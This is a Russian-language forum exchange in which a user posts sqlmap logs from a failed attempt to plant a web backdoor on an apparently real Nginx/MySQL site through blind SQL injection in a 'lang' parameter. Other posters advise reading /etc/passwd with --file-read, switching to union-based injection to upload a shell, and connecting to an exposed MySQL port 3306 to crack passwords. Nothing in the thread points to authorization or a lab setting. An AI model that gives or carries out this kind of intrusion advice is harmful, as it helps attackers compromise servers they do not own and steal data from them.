Где логи действий? Где ответа сервера? Или нам представить нужно что ты делал и что не получается?

web application technology: Nginx

back-end DBMS: MySQL >= 5.0.12

[12:20:48] [INFO] going to use a web backdoor for command prompt

[12:20:48] [INFO] fingerprinting the back-end DBMS operating system

[12:20:48] [INFO] the back-end DBMS operating system is Linux

which web application language does the web server support?

[1] ASP

[2] ASPX

[3] JSP

[4] PHP (default)

> 4

do you want sqlmap to further try to provoke the full path disclosure? [Y/n] y

[12:21:00] [WARNING] unable to automatically retrieve the web server document root

what do you want to use for writable directory?

[1] common location(s) ('/var/www/, /var/www/html, /usr/local/apache2/htdocs, /var/www/nginx-default, /srv/www') (default)

[2] custom location(s)

[3] custom directory list file

[4] brute force search

> 1

[12:21:04] [WARNING] unable to automatically parse any web server path

[12:21:04] [INFO] trying to upload the file stager on '/var/www/' via LIMIT 'LINES TERMINATED BY' method

[12:21:04] [INFO] heuristics detected web page charset 'ascii'

[12:21:04] [WARNING] unable to upload the file stager on '/var/www/'

[12:21:04] [INFO] trying to upload the file stager on '/var/www/i/pages/' via LIMIT 'LINES TERMINATED BY' method

[12:21:05] [WARNING] unable to upload the file stager on '/var/www/i/pages/'

[12:21:05] [INFO] trying to upload the file stager on '/var/www/html/' via LIMIT 'LINES TERMINATED BY' method

[12:21:06] [WARNING] unable to upload the file stager on '/var/www/html/'

[12:21:06] [INFO] trying to upload the file stager on '/var/www/html/i/pages/' via LIMIT 'LINES TERMINATED BY' method

[12:21:07] [WARNING] unable to upload the file stager on '/var/www/html/i/pages/'

[12:21:07] [INFO] trying to upload the file stager on '/usr/local/apache2/htdocs/' via LIMIT 'LINES TERMINATED BY' method

[12:21:07] [WARNING] unable to upload the file stager on '/usr/local/apache2/htdocs/'

[12:21:07] [INFO] trying to upload the file stager on '/usr/local/apache2/htdocs/i/pages/' via LIMIT 'LINES TERMINATED BY' method

[12:21:08] [WARNING] unable to upload the file stager on '/usr/local/apache2/htdocs/i/pages/'

[12:21:08] [INFO] trying to upload the file stager on '/var/www/nginx-default/' via LIMIT 'LINES TERMINATED BY' method

[12:21:09] [WARNING] unable to upload the file stager on '/var/www/nginx-default/'

[12:21:09] [INFO] trying to upload the file stager on '/var/www/nginx-default/i/pages/' via LIMIT 'LINES TERMINATED BY' method

[12:21:10] [WARNING] unable to upload the file stager on '/var/www/nginx-default/i/pages/'

[12:21:10] [INFO] trying to upload the file stager on '/srv/www/' via LIMIT 'LINES TERMINATED BY' method

[12:21:10] [WARNING] unable to upload the file stager on '/srv/www/'

[12:21:10] [INFO] trying to upload the file stager on '/srv/www/i/pages/' via LIMIT 'LINES TERMINATED BY' method

[12:21:11] [WARNING] unable to upload the file stager on '/srv/www/i/pages/'

[12:21:11] [WARNING] HTTP error codes detected during run:

404 (Not Found) - 43 times

почему так много 404, там ваф? путь к doc_root известен или наугад?

путь не известен дефолтный список sqlmap

вафа вроде нет но сама скуля типа

Parameter: lang (GET)

Type: boolean-based blind

ну так ищите сначала ошибку в сайтах, что-бы раскрывали вам путь.

это ясно я искал не нашел думал может подскажут другой какой вариант

как?

попробуй сначала

--file-read="/etc/passwd" если считает,то нужно директорию найти будет на запись и залить туда через

а не автоподбором

UPD

не заметил , Type: boolean-based blind

не зальешься,нужно union

если повезет - открыт 3306, можно подключаться удаленно, и сможешь расшифровать пароль, то как вариант подключиться к бд и оттуда залиться, но все равно надо путь искать